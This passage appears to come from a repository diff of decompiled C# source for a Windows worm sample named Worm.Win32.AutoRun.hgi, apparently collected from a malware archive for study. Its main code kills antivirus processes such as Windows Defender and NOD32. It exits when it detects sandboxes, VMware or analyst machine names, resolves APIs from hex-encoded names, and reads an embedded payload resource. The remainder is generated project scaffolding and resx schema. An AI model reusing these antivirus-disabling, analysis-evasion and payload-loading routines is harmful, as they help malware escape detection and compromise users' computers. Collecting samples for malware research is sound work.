processes[index].Kill();
checked { ++index; }
}
}
public static void AntiVirtualPC()
{
Process[] processes = Process.GetProcesses();
int num = checked (processes.Length - 1);
int index = 0;
while (index <= num)
{
if (Operators.CompareString(Strings.LCase(processes[index].ProcessName), "vpcmapvmsrvc", false) == 0)
processes[index].Kill();
checked { ++index; }
}
}
public static void AntiOutPost()
{
Process[] processes = Process.GetProcesses();
int num = checked (processes.Length - 1);
int index = 0;
while (index <= num)
{
if (Operators.CompareString(Strings.LCase(processes[index].ProcessName), "acs.exe", false) == 0)
processes[index].Kill();
checked { ++index; }
}
}
public static void AntiEstNod32()
{
Process[] processes = Process.GetProcesses();
int num = checked (processes.Length - 1);
int index = 0;
while (index <= num)
{
if (Operators.CompareString(Strings.LCase(processes[index].ProcessName), "nod32.exenod32krn.exeekrn.exe", false) == 0)
processes[index].Kill();
checked { ++index; }
}
}
[DllImport("user32", EntryPoint = "FindWindowA", CharSet = CharSet.Ansi, SetLastError = true)]
private static extern long FindWindow([MarshalAs(UnmanagedType.VBByRefStr)] ref string lpClassName, [MarshalAs(UnmanagedType.VBByRefStr)] ref string lpWindowName);
public static void mofo()
{
Form1.seekit("MSASCui");
Form1.seekit("msmpeng");
Form1.AntiSandboxie();
Form1.IsVmWare();
Form1.AntiThreatExpert();
Form1.checkUsername();
Form1.checkComputername();
}
private static void seekit(string gay1)
{
Process[] processes = Process.GetProcesses();
int index = 0;
while (index < processes.Length)
{
Process process = processes[index];
if (process.ProcessName.Contains(gay1))
{
try
{
process.Kill();
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
}
checked { ++index; }
}
}
private static void checkUsername()
{
List<string> stringList = new List<string>();
stringList.Add("UserName");
stringList.Add("User");
stringList.Add("honey");
stringList.Add("sandbox");
stringList.Add("currentuser");
stringList.Add("User");
try
{
foreach (string Right in stringList)
{
if (Operators.CompareString(Environment.UserName, Right, false) == 0)
Environment.Exit(0);
}
}
finally
{
List<string>.Enumerator enumerator;
enumerator.Dispose();
}
}
private static void checkComputername()
{
List<string> stringList = new List<string>();
stringList.Add("ComputerName");
stringList.Add("COMPUTERNAME");
stringList.Add("DELL-D3E62F7E26");
stringList.Add("DWI-9625AC2E275");
stringList.Add("MICHAEL-F156CF7");
try
{
foreach (string Right in stringList)
{
if (Operators.CompareString(Environment.MachineName, Right, false) == 0)
Environment.Exit(0);
}
}
finally
{
List<string>.Enumerator enumerator;
enumerator.Dispose();
}
}
public static void AntiSandboxie()
{
if (Process.GetProcessesByName("SbieSvc").Length < 1)
return;
Environment.Exit(0);
}
public static void IsVmWare()
{
string str1 = "VMDragDetectWndClass";
ref string local1 = ref str1;
string str2 = (string) null;
ref string local2 = ref str2;
if (Form1.FindWindow(ref local1, ref local2) != 0L)
return;
Environment.Exit(0);
}
private static void AntiThreatExpert()
{
if (!Process.GetCurrentProcess().MainModule.FileName.Contains("sample"))
return;
Environment.Exit(0);
}
}
}
MSIL/Worm/Win32/A/Worm.Win32.AutoRun.hgi-f7f655882362e3de6b26b28c84c129a11a52fb9cd813ce2911fb258b72766e44/Form1.resx
+120
View File
@@ -0,0 +1,120 @@
<?xml version="1.0" encoding="utf-8"?>
<root>
<!--
Microsoft ResX Schema
Version 2.0
The primary goals of this format is to allow a simple XML format
that is mostly human readable. The generation and parsing of the
various data types are done through the TypeConverter classes
associated with the data types.
Example:
... ado.net/XML headers & schema ...
<resheader name="resmimetype">text/microsoft-resx</resheader>
<resheader name="version">2.0</resheader>
<resheader name="reader">System.Resources.ResXResourceReader, System.Windows.Forms, ...</resheader>
<resheader name="writer">System.Resources.ResXResourceWriter, System.Windows.Forms, ...</resheader>
<data name="Name1"><value>this is my long string</value><comment>this is a comment</comment></data>
<data name="Color1" type="System.Drawing.Color, System.Drawing">Blue</data>
<data name="Bitmap1" mimetype="application/x-microsoft.net.object.binary.base64">
<value>[base64 mime encoded serialized .NET Framework object]</value>
</data>
<data name="Icon1" type="System.Drawing.Icon, System.Drawing" mimetype="application/x-microsoft.net.object.bytearray.base64">
<value>[base64 mime encoded string representing a byte array form of the .NET Framework object]</value>
<comment>This is a comment</comment>
</data>
There are any number of "resheader" rows that contain simple
name/value pairs.
Each data row contains a name, and value. The row also contains a
type or mimetype. Type corresponds to a .NET class that support
text/value conversion through the TypeConverter architecture.
Classes that don't support this are serialized and stored with the
mimetype set.
The mimetype is used for serialized objects, and tells the
ResXResourceReader how to depersist the object. This is currently not
extensible. For a given mimetype the value must be set accordingly:
Note - application/x-microsoft.net.object.binary.base64 is the format
that the ResXResourceWriter will generate, however the reader can
read any of the formats listed below.
mimetype: application/x-microsoft.net.object.binary.base64
value : The object must be serialized with
: System.Runtime.Serialization.Formatters.Binary.BinaryFormatter
: and then encoded with base64 encoding.
mimetype: application/x-microsoft.net.object.soap.base64
value : The object must be serialized with
: System.Runtime.Serialization.Formatters.Soap.SoapFormatter
: and then encoded with base64 encoding.
mimetype: application/x-microsoft.net.object.bytearray.base64
value : The object must be serialized into a byte array
: using a System.ComponentModel.TypeConverter
: and then encoded with base64 encoding.
-->
<xsd:schema id="root" xmlns="" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:msdata="urn:schemas-microsoft-com:xml-msdata">
<xsd:import namespace="http://www.w3.org/XML/1998/namespace" />
<xsd:element name="root" msdata:IsDataSet="true">
<xsd:complexType>
<xsd:choice maxOccurs="unbounded">
<xsd:element name="metadata">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" />
</xsd:sequence>
<xsd:attribute name="name" use="required" type="xsd:string" />
<xsd:attribute name="type" type="xsd:string" />
<xsd:attribute name="mimetype" type="xsd:string" />
<xsd:attribute ref="xml:space" />
</xsd:complexType>
</xsd:element>
<xsd:element name="assembly">
<xsd:complexType>
<xsd:attribute name="alias" type="xsd:string" />
<xsd:attribute name="name" type="xsd:string" />
</xsd:complexType>
</xsd:element>
<xsd:element name="data">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" msdata:Ordinal="1" />
<xsd:element name="comment" type="xsd:string" minOccurs="0" msdata:Ordinal="2" />
</xsd:sequence>
<xsd:attribute name="name" type="xsd:string" use="required" msdata:Ordinal="1" />
<xsd:attribute name="type" type="xsd:string" msdata:Ordinal="3" />
<xsd:attribute name="mimetype" type="xsd:string" msdata:Ordinal="4" />
<xsd:attribute ref="xml:space" />
</xsd:complexType>
</xsd:element>
<xsd:element name="resheader">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" msdata:Ordinal="1" />
</xsd:sequence>
<xsd:attribute name="name" type="xsd:string" use="required" />
</xsd:complexType>
</xsd:element>
</xsd:choice>
</xsd:complexType>
</xsd:element>
</xsd:schema>
<resheader name="resmimetype">
<value>text/microsoft-resx</value>
</resheader>
<resheader name="version">
<value>2.0</value>
</resheader>
<resheader name="reader">
<value>System.Resources.ResXResourceReader, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
</resheader>
<resheader name="writer">
<value>System.Resources.ResXResourceWriter, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
</resheader>
</root>
MSIL/Worm/Win32/A/Worm.Win32.AutoRun.hgi-f7f655882362e3de6b26b28c84c129a11a52fb9cd813ce2911fb258b72766e44/My/MyApplication.cs
+48
View File
@@ -0,0 +1,48 @@
// Decompiled with JetBrains decompiler
// Type: BCV5StuB.My.MyApplication
// Assembly: Windows, Version=7.8.9.10, Culture=neutral, PublicKeyToken=null
// MVID: 9F0D14B2-64CD-49F4-8243-2271113E9FED
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Worm.Win32.AutoRun.hgi-f7f655882362e3de6b26b28c84c129a11a52fb9cd813ce2911fb258b72766e44.exe
using Microsoft.VisualBasic.ApplicationServices;
using System;
using System.CodeDom.Compiler;
using System.ComponentModel;
using System.Diagnostics;
using System.Windows.Forms;
namespace BCV5StuB.My
{
[GeneratedCode("MyTemplate", "8.0.0.0")]
[EditorBrowsable(EditorBrowsableState.Never)]
internal class MyApplication : WindowsFormsApplicationBase
{
[STAThread]
[EditorBrowsable(EditorBrowsableState.Advanced)]
[DebuggerHidden]
internal static void Main(string[] Args)
{
try
{
Application.SetCompatibleTextRenderingDefault(WindowsFormsApplicationBase.UseCompatibleTextRendering);
}
finally
{
}
MyProject.Application.Run(Args);
}
[DebuggerStepThrough]
public MyApplication()
: base(AuthenticationMode.Windows)
{
this.IsSingleInstance = false;
this.EnableVisualStyles = true;
this.SaveMySettingsOnExit = true;
this.ShutdownStyle = ShutdownMode.AfterMainFormCloses;
}
[DebuggerStepThrough]
protected override void OnCreateMainForm() => this.MainForm = (Form) MyProject.Forms.Form1;
}
}
MSIL/Worm/Win32/A/Worm.Win32.AutoRun.hgi-f7f655882362e3de6b26b28c84c129a11a52fb9cd813ce2911fb258b72766e44/My/MyComputer.cs
+24
View File
@@ -0,0 +1,24 @@
// Decompiled with JetBrains decompiler
// Type: BCV5StuB.My.MyComputer
// Assembly: Windows, Version=7.8.9.10, Culture=neutral, PublicKeyToken=null
// MVID: 9F0D14B2-64CD-49F4-8243-2271113E9FED
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Worm.Win32.AutoRun.hgi-f7f655882362e3de6b26b28c84c129a11a52fb9cd813ce2911fb258b72766e44.exe
using Microsoft.VisualBasic.Devices;
using System.CodeDom.Compiler;
using System.ComponentModel;
using System.Diagnostics;
namespace BCV5StuB.My
{
[GeneratedCode("MyTemplate", "8.0.0.0")]
[EditorBrowsable(EditorBrowsableState.Never)]
internal class MyComputer : Computer
{
[DebuggerHidden]
[EditorBrowsable(EditorBrowsableState.Never)]
public MyComputer()
{
}
}
}
MSIL/Worm/Win32/A/Worm.Win32.AutoRun.hgi-f7f655882362e3de6b26b28c84c129a11a52fb9cd813ce2911fb258b72766e44/My/MyProject.cs
+212
View File
@@ -0,0 +1,212 @@
// Decompiled with JetBrains decompiler
// Type: BCV5StuB.My.MyProject
// Assembly: Windows, Version=7.8.9.10, Culture=neutral, PublicKeyToken=null
// MVID: 9F0D14B2-64CD-49F4-8243-2271113E9FED
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Worm.Win32.AutoRun.hgi-f7f655882362e3de6b26b28c84c129a11a52fb9cd813ce2911fb258b72766e44.exe
using Microsoft.VisualBasic;
using Microsoft.VisualBasic.ApplicationServices;
using Microsoft.VisualBasic.CompilerServices;
using System;
using System.CodeDom.Compiler;
using System.Collections;
using System.ComponentModel;
using System.ComponentModel.Design;
using System.Diagnostics;
using System.Reflection;
using System.Runtime.CompilerServices;
using System.Runtime.InteropServices;
using System.Windows.Forms;
namespace BCV5StuB.My
{
[HideModuleName]
[GeneratedCode("MyTemplate", "8.0.0.0")]
[StandardModule]
internal sealed class MyProject
{
private static readonly MyProject.ThreadSafeObjectProvider<MyComputer> m_ComputerObjectProvider = new MyProject.ThreadSafeObjectProvider<MyComputer>();
private static readonly MyProject.ThreadSafeObjectProvider<MyApplication> m_AppObjectProvider = new MyProject.ThreadSafeObjectProvider<MyApplication>();
private static readonly MyProject.ThreadSafeObjectProvider<User> m_UserObjectProvider = new MyProject.ThreadSafeObjectProvider<User>();
private static MyProject.ThreadSafeObjectProvider<MyProject.MyForms> m_MyFormsObjectProvider = new MyProject.ThreadSafeObjectProvider<MyProject.MyForms>();
private static readonly MyProject.ThreadSafeObjectProvider<MyProject.MyWebServices> m_MyWebServicesObjectProvider = new MyProject.ThreadSafeObjectProvider<MyProject.MyWebServices>();
[DebuggerNonUserCode]
static MyProject()
{
}
[HelpKeyword("My.Computer")]
internal static MyComputer Computer
{
[DebuggerHidden] get => MyProject.m_ComputerObjectProvider.GetInstance;
}
[HelpKeyword("My.Application")]
internal static MyApplication Application
{
[DebuggerHidden] get => MyProject.m_AppObjectProvider.GetInstance;
}
[HelpKeyword("My.User")]
internal static User User
{
[DebuggerHidden] get => MyProject.m_UserObjectProvider.GetInstance;
}
[HelpKeyword("My.Forms")]
internal static MyProject.MyForms Forms
{
[DebuggerHidden] get => MyProject.m_MyFormsObjectProvider.GetInstance;
}
[HelpKeyword("My.WebServices")]
internal static MyProject.MyWebServices WebServices
{
[DebuggerHidden] get => MyProject.m_MyWebServicesObjectProvider.GetInstance;
}
[MyGroupCollection("System.Windows.Forms.Form", "Create__Instance__", "Dispose__Instance__", "My.MyProject.Forms")]
[EditorBrowsable(EditorBrowsableState.Never)]
internal sealed class MyForms
{
public Form1 m_Form1;
[ThreadStatic]
private static Hashtable m_FormBeingCreated;
public Form1 Form1
{
[DebuggerNonUserCode] get
{
this.m_Form1 = MyProject.MyForms.Create__Instance__<Form1>(this.m_Form1);
return this.m_Form1;
}
[DebuggerNonUserCode] set
{
if (value == this.m_Form1)
return;
if (value != null)
throw new ArgumentException("Property can only be set to Nothing");
this.Dispose__Instance__<Form1>(ref this.m_Form1);
}
}
[DebuggerHidden]
private static T Create__Instance__<T>(T Instance) where T : Form, new()
{
if ((object) Instance != null && !Instance.IsDisposed)
return Instance;
if (MyProject.MyForms.m_FormBeingCreated != null)
{
if (MyProject.MyForms.m_FormBeingCreated.ContainsKey((object) typeof (T)))
throw new InvalidOperationException(Utils.GetResourceString("WinForms_RecursiveFormCreate"));
}
else
MyProject.MyForms.m_FormBeingCreated = new Hashtable();
MyProject.MyForms.m_FormBeingCreated.Add((object) typeof (T), (object) null);
try
{
return new T();
}
catch (TargetInvocationException ex) when (
{
// ISSUE: unable to correctly present filter
ProjectData.SetProjectError((Exception) ex);
if (ex.InnerException != null)
{
SuccessfulFiltering;
}
else
throw;
}
)
{
throw new InvalidOperationException(Utils.GetResourceString("WinForms_SeeInnerException", ex.InnerException.Message), ex.InnerException);
}
finally
{
MyProject.MyForms.m_FormBeingCreated.Remove((object) typeof (T));
}
}
[DebuggerHidden]
private void Dispose__Instance__<T>(ref T instance) where T : Form
{
instance.Dispose();
instance = default (T);
}
[EditorBrowsable(EditorBrowsableState.Never)]
[DebuggerHidden]
public MyForms()
{
}
[EditorBrowsable(EditorBrowsableState.Never)]
public override bool Equals(object o) => base.Equals(RuntimeHelpers.GetObjectValue(o));
[EditorBrowsable(EditorBrowsableState.Never)]
public override int GetHashCode() => base.GetHashCode();
[EditorBrowsable(EditorBrowsableState.Never)]
internal new System.Type GetType() => typeof (MyProject.MyForms);
[EditorBrowsable(EditorBrowsableState.Never)]
public override string ToString() => base.ToString();
}
[EditorBrowsable(EditorBrowsableState.Never)]
[MyGroupCollection("System.Web.Services.Protocols.SoapHttpClientProtocol", "Create__Instance__", "Dispose__Instance__", "")]
internal sealed class MyWebServices
{
[EditorBrowsable(EditorBrowsableState.Never)]
[DebuggerHidden]
public override bool Equals(object o) => base.Equals(RuntimeHelpers.GetObjectValue(o));
[DebuggerHidden]
[EditorBrowsable(EditorBrowsableState.Never)]
public override int GetHashCode() => base.GetHashCode();
[EditorBrowsable(EditorBrowsableState.Never)]
[DebuggerHidden]
internal new System.Type GetType() => typeof (MyProject.MyWebServices);
[EditorBrowsable(EditorBrowsableState.Never)]
[DebuggerHidden]
public override string ToString() => base.ToString();
[DebuggerHidden]
private static T Create__Instance__<T>(T instance) where T : new() => (object) instance == null ? new T() : instance;
[DebuggerHidden]
private void Dispose__Instance__<T>(ref T instance) => instance = default (T);
[EditorBrowsable(EditorBrowsableState.Never)]
[DebuggerHidden]
public MyWebServices()
{
}
}
[EditorBrowsable(EditorBrowsableState.Never)]
[ComVisible(false)]
internal sealed class ThreadSafeObjectProvider<T> where T : new()
{
internal T GetInstance
{
[DebuggerHidden] get
{
if ((object) MyProject.ThreadSafeObjectProvider<T>.m_ThreadStaticValue == null)
MyProject.ThreadSafeObjectProvider<T>.m_ThreadStaticValue = new T();
return MyProject.ThreadSafeObjectProvider<T>.m_ThreadStaticValue;
}
}
[DebuggerHidden]
[EditorBrowsable(EditorBrowsableState.Never)]
public ThreadSafeObjectProvider()
{
}
}
}
}
MSIL/Worm/Win32/A/Worm.Win32.AutoRun.hgi-f7f655882362e3de6b26b28c84c129a11a52fb9cd813ce2911fb258b72766e44/My/MySettings.cs
+73
View File
@@ -0,0 +1,73 @@
// Decompiled with JetBrains decompiler
// Type: BCV5StuB.My.MySettings
// Assembly: Windows, Version=7.8.9.10, Culture=neutral, PublicKeyToken=null
// MVID: 9F0D14B2-64CD-49F4-8243-2271113E9FED
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Worm.Win32.AutoRun.hgi-f7f655882362e3de6b26b28c84c129a11a52fb9cd813ce2911fb258b72766e44.exe
using Microsoft.VisualBasic.ApplicationServices;
using Microsoft.VisualBasic.CompilerServices;
using System;
using System.CodeDom.Compiler;
using System.ComponentModel;
using System.Configuration;
using System.Diagnostics;
using System.Runtime.CompilerServices;
using System.Threading;
namespace BCV5StuB.My
{
[EditorBrowsable(EditorBrowsableState.Advanced)]
[CompilerGenerated]
[GeneratedCode("Microsoft.VisualStudio.Editors.SettingsDesigner.SettingsSingleFileGenerator", "9.0.0.0")]
internal sealed class MySettings : ApplicationSettingsBase
{
private static MySettings defaultInstance = (MySettings) SettingsBase.Synchronized((SettingsBase) new MySettings());
private static bool addedHandler;
private static object addedHandlerLockObject = RuntimeHelpers.GetObjectValue(new object());
[DebuggerNonUserCode]
public MySettings()
{
}
[DebuggerNonUserCode]
[EditorBrowsable(EditorBrowsableState.Advanced)]
private static void AutoSaveSettings(object sender, EventArgs e)
{
if (!MyProject.Application.SaveMySettingsOnExit)
return;
MySettingsProperty.Settings.Save();
}
public static MySettings Default
{
get
{
if (!MySettings.addedHandler)
{
object handlerLockObject = MySettings.addedHandlerLockObject;
ObjectFlowControl.CheckForSyncLockOnValueType(handlerLockObject);
Monitor.Enter(handlerLockObject);
try
{
if (!MySettings.addedHandler)
{
MyProject.Application.Shutdown += (ShutdownEventHandler) ((sender, e) =>
{
if (!MyProject.Application.SaveMySettingsOnExit)
return;
MySettingsProperty.Settings.Save();
});
MySettings.addedHandler = true;
}
}
finally
{
Monitor.Exit(handlerLockObject);
}
}
return MySettings.defaultInstance;
}
}
}
}
MSIL/Worm/Win32/A/Worm.Win32.AutoRun.hgi-f7f655882362e3de6b26b28c84c129a11a52fb9cd813ce2911fb258b72766e44/My/MySettingsProperty.cs
+24
View File
@@ -0,0 +1,24 @@
// Decompiled with JetBrains decompiler
// Type: BCV5StuB.My.MySettingsProperty
// Assembly: Windows, Version=7.8.9.10, Culture=neutral, PublicKeyToken=null
// MVID: 9F0D14B2-64CD-49F4-8243-2271113E9FED
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Worm.Win32.AutoRun.hgi-f7f655882362e3de6b26b28c84c129a11a52fb9cd813ce2911fb258b72766e44.exe
using Microsoft.VisualBasic;
using Microsoft.VisualBasic.CompilerServices;
using System.ComponentModel.Design;
using System.Diagnostics;
using System.Runtime.CompilerServices;
namespace BCV5StuB.My
{
[StandardModule]
[DebuggerNonUserCode]
[HideModuleName]
[CompilerGenerated]
internal sealed class MySettingsProperty
{
[HelpKeyword("My.Settings")]
internal static MySettings Settings => MySettings.Default;
}
}
MSIL/Worm/Win32/A/Worm.Win32.AutoRun.hgi-f7f655882362e3de6b26b28c84c129a11a52fb9cd813ce2911fb258b72766e44/My/Resources/Resources.cs
+46
View File
@@ -0,0 +1,46 @@
// Decompiled with JetBrains decompiler
// Type: BCV5StuB.My.Resources.Resources
// Assembly: Windows, Version=7.8.9.10, Culture=neutral, PublicKeyToken=null
// MVID: 9F0D14B2-64CD-49F4-8243-2271113E9FED
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Worm.Win32.AutoRun.hgi-f7f655882362e3de6b26b28c84c129a11a52fb9cd813ce2911fb258b72766e44.exe
using Microsoft.VisualBasic;
using Microsoft.VisualBasic.CompilerServices;
using System.CodeDom.Compiler;
using System.ComponentModel;
using System.Diagnostics;
using System.Globalization;
using System.Resources;
using System.Runtime.CompilerServices;
namespace BCV5StuB.My.Resources
{
[DebuggerNonUserCode]
[GeneratedCode("System.Resources.Tools.StronglyTypedResourceBuilder", "2.0.0.0")]
[CompilerGenerated]
[HideModuleName]
[StandardModule]
internal sealed class Resources
{
private static ResourceManager resourceMan;
private static CultureInfo resourceCulture;
[EditorBrowsable(EditorBrowsableState.Advanced)]
internal static ResourceManager ResourceManager
{
get
{
if (object.ReferenceEquals((object) BCV5StuB.My.Resources.Resources.resourceMan, (object) null))
BCV5StuB.My.Resources.Resources.resourceMan = new ResourceManager("BCV5StuB.Resources", typeof (BCV5StuB.My.Resources.Resources).Assembly);
return BCV5StuB.My.Resources.Resources.resourceMan;
}
}
[EditorBrowsable(EditorBrowsableState.Advanced)]
internal static CultureInfo Culture
{
get => BCV5StuB.My.Resources.Resources.resourceCulture;
set => BCV5StuB.My.Resources.Resources.resourceCulture = value;
}
}
}
MSIL/Worm/Win32/A/Worm.Win32.AutoRun.hgi-f7f655882362e3de6b26b28c84c129a11a52fb9cd813ce2911fb258b72766e44/NativeDllCalls.cs
+91
View File
@@ -0,0 +1,91 @@
// Decompiled with JetBrains decompiler
// Type: BCV5StuB.NativeDllCalls
// Assembly: Windows, Version=7.8.9.10, Culture=neutral, PublicKeyToken=null
// MVID: 9F0D14B2-64CD-49F4-8243-2271113E9FED
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Worm.Win32.AutoRun.hgi-f7f655882362e3de6b26b28c84c129a11a52fb9cd813ce2911fb258b72766e44.exe
using Microsoft.VisualBasic;
using Microsoft.VisualBasic.CompilerServices;
using Microsoft.Win32.SafeHandles;
using System;
using System.Diagnostics;
using System.Globalization;
using System.Runtime.ConstrainedExecution;
using System.Runtime.InteropServices;
using System.Security.Permissions;
namespace BCV5StuB
{
public abstract class NativeDllCalls
{
[DebuggerNonUserCode]
public NativeDllCalls()
{
}
public Delegate DynamicCall(string sHexLib, string sHexMethod, Type oType)
{
string fileName = this.HexToString(sHexLib);
string procname = this.HexToString(sHexMethod);
NativeDllCalls.SafeLibraryHandle hModule = NativeDllCalls.Methods.LoadLibrary(fileName);
Delegate @delegate = (Delegate) null;
if (!hModule.IsInvalid && !hModule.IsClosed)
{
@delegate = Marshal.GetDelegateForFunctionPointer(NativeDllCalls.Methods.GetProcAddress(hModule, procname), oType);
hModule.Close();
}
return @delegate;
}
public string HexToString(string sText)
{
string str1 = sText;
string str2 = "";
if (str1.StartsWith("0x"))
str1 = str1.Substring(2);
int startIndex = 0;
while (startIndex < str1.Length)
{
string s = str1.Substring(startIndex, 2);
str2 += Conversions.ToString(Strings.ChrW((int) ushort.Parse(s, NumberStyles.HexNumber)));
checked { startIndex += 2; }
}
return str2;
}
[SecurityPermission(SecurityAction.LinkDemand, UnmanagedCode = true)]
public sealed class SafeLibraryHandle : SafeHandleZeroOrMinusOneIsInvalid
{
private SafeLibraryHandle()
: base(true)
{
}
protected override bool ReleaseHandle() => NativeDllCalls.Methods.FreeLibrary(this.handle);
}
public sealed class Methods
{
private const string KERNEL32 = "kernel32";
[DebuggerNonUserCode]
public Methods()
{
}
[DllImport("kernel32", CharSet = CharSet.Auto, SetLastError = true, BestFitMapping = false)]
public static extern NativeDllCalls.SafeLibraryHandle LoadLibrary(
string fileName);
[ReliabilityContract(Consistency.WillNotCorruptState, Cer.Success)]
[DllImport("kernel32", SetLastError = true)]
[return: MarshalAs(UnmanagedType.Bool)]
public static extern bool FreeLibrary(IntPtr hModule);
[DllImport("kernel32")]
public static extern IntPtr GetProcAddress(
NativeDllCalls.SafeLibraryHandle hModule,
string procname);
}
}
}
MSIL/Worm/Win32/A/Worm.Win32.AutoRun.hgi-f7f655882362e3de6b26b28c84c129a11a52fb9cd813ce2911fb258b72766e44/ResourceReader.cs
+73
View File
@@ -0,0 +1,73 @@
// Decompiled with JetBrains decompiler
// Type: BCV5StuB.ResourceReader
// Assembly: Windows, Version=7.8.9.10, Culture=neutral, PublicKeyToken=null
// MVID: 9F0D14B2-64CD-49F4-8243-2271113E9FED
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Worm.Win32.AutoRun.hgi-f7f655882362e3de6b26b28c84c129a11a52fb9cd813ce2911fb258b72766e44.exe
using Microsoft.VisualBasic.CompilerServices;
using System;
using System.Runtime.InteropServices;
namespace BCV5StuB
{
[StandardModule]
internal sealed class ResourceReader
{
[DllImport("kernel32.dll", SetLastError = true)]
private static extern IntPtr FindResource(IntPtr hModule, string lpName, string lpType);
[DllImport("kernel32", EntryPoint = "GetModuleHandleA", CharSet = CharSet.Ansi, SetLastError = true)]
private static extern IntPtr GetModuleHandle([MarshalAs(UnmanagedType.VBByRefStr)] ref string moduleName);
[DllImport("kernel32", CharSet = CharSet.Ansi, SetLastError = true)]
private static extern int SizeofResource(IntPtr hModule, IntPtr hResInfo);
[DllImport("kernel32", CharSet = CharSet.Ansi, SetLastError = true)]
private static extern IntPtr LoadResource(IntPtr hModule, IntPtr hResInfo);
public static byte[] ReadResource(string filename)
{
IntPtr moduleHandle = ResourceReader.GetModuleHandle(ref filename);
IntPtr resource = ResourceReader.FindResource(moduleHandle, "0", "RT_RCDATA");
IntPtr source = ResourceReader.LoadResource(moduleHandle, resource);
int length = ResourceReader.SizeofResource(moduleHandle, resource);
byte[] destination = new byte[checked (length - 1 + 1)];
Marshal.Copy(source, destination, 0, length);
return destination;
}
public static void JuNk_TArWpB339454171()
{
try
{
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
for (double num = 0.3672802; num <= 0.05310881; ++num)
{
try
{
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
}
while (true)
{
try
{
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
}
}
}
}
MSIL/Worm/Win32/A/Worm.Win32.AutoRun.hgi-f7f655882362e3de6b26b28c84c129a11a52fb9cd813ce2911fb258b72766e44/Resources.resx
+120
View File
@@ -0,0 +1,120 @@
<?xml version="1.0" encoding="utf-8"?>
<root>
<!--
Microsoft ResX Schema
Version 2.0
The primary goals of this format is to allow a simple XML format
that is mostly human readable. The generation and parsing of the
various data types are done through the TypeConverter classes
associated with the data types.
Example:
... ado.net/XML headers & schema ...
<resheader name="resmimetype">text/microsoft-resx</resheader>
<resheader name="version">2.0</resheader>
<resheader name="reader">System.Resources.ResXResourceReader, System.Windows.Forms, ...</resheader>
<resheader name="writer">System.Resources.ResXResourceWriter, System.Windows.Forms, ...</resheader>
<data name="Name1"><value>this is my long string</value><comment>this is a comment</comment></data>
<data name="Color1" type="System.Drawing.Color, System.Drawing">Blue</data>
<data name="Bitmap1" mimetype="application/x-microsoft.net.object.binary.base64">
<value>[base64 mime encoded serialized .NET Framework object]</value>
</data>
<data name="Icon1" type="System.Drawing.Icon, System.Drawing" mimetype="application/x-microsoft.net.object.bytearray.base64">
<value>[base64 mime encoded string representing a byte array form of the .NET Framework object]</value>
<comment>This is a comment</comment>
</data>
There are any number of "resheader" rows that contain simple
name/value pairs.
Each data row contains a name, and value. The row also contains a
type or mimetype. Type corresponds to a .NET class that support
text/value conversion through the TypeConverter architecture.
Classes that don't support this are serialized and stored with the
mimetype set.
The mimetype is used for serialized objects, and tells the
ResXResourceReader how to depersist the object. This is currently not
extensible. For a given mimetype the value must be set accordingly:
Note - application/x-microsoft.net.object.binary.base64 is the format
that the ResXResourceWriter will generate, however the reader can
read any of the formats listed below.
mimetype: application/x-microsoft.net.object.binary.base64
value : The object must be serialized with
: System.Runtime.Serialization.Formatters.Binary.BinaryFormatter
: and then encoded with base64 encoding.
mimetype: application/x-microsoft.net.object.soap.base64
value : The object must be serialized with
: System.Runtime.Serialization.Formatters.Soap.SoapFormatter
: and then encoded with base64 encoding.
mimetype: application/x-microsoft.net.object.bytearray.base64
value : The object must be serialized into a byte array
: using a System.ComponentModel.TypeConverter
: and then encoded with base64 encoding.
-->
<xsd:schema id="root" xmlns="" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:msdata="urn:schemas-microsoft-com:xml-msdata">
<xsd:import namespace="http://www.w3.org/XML/1998/namespace" />
<xsd:element name="root" msdata:IsDataSet="true">
<xsd:complexType>
<xsd:choice maxOccurs="unbounded">
<xsd:element name="metadata">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" />
</xsd:sequence>
<xsd:attribute name="name" use="required" type="xsd:string" />
<xsd:attribute name="type" type="xsd:string" />
<xsd:attribute name="mimetype" type="xsd:string" />
<xsd:attribute ref="xml:space" />
</xsd:complexType>
</xsd:element>
<xsd:element name="assembly">
<xsd:complexType>
<xsd:attribute name="alias" type="xsd:string" />
<xsd:attribute name="name" type="xsd:string" />
</xsd:complexType>
</xsd:element>
<xsd:element name="data">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" msdata:Ordinal="1" />
<xsd:element name="comment" type="xsd:string" minOccurs="0" msdata:Ordinal="2" />
</xsd:sequence>
<xsd:attribute name="name" type="xsd:string" use="required" msdata:Ordinal="1" />
<xsd:attribute name="type" type="xsd:string" msdata:Ordinal="3" />
<xsd:attribute name="mimetype" type="xsd:string" msdata:Ordinal="4" />
<xsd:attribute ref="xml:space" />
</xsd:complexType>
</xsd:element>
<xsd:element name="resheader">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" msdata:Ordinal="1" />
</xsd:sequence>
<xsd:attribute name="name" type="xsd:string" use="required" />
</xsd:complexType>
</xsd:element>
</xsd:choice>
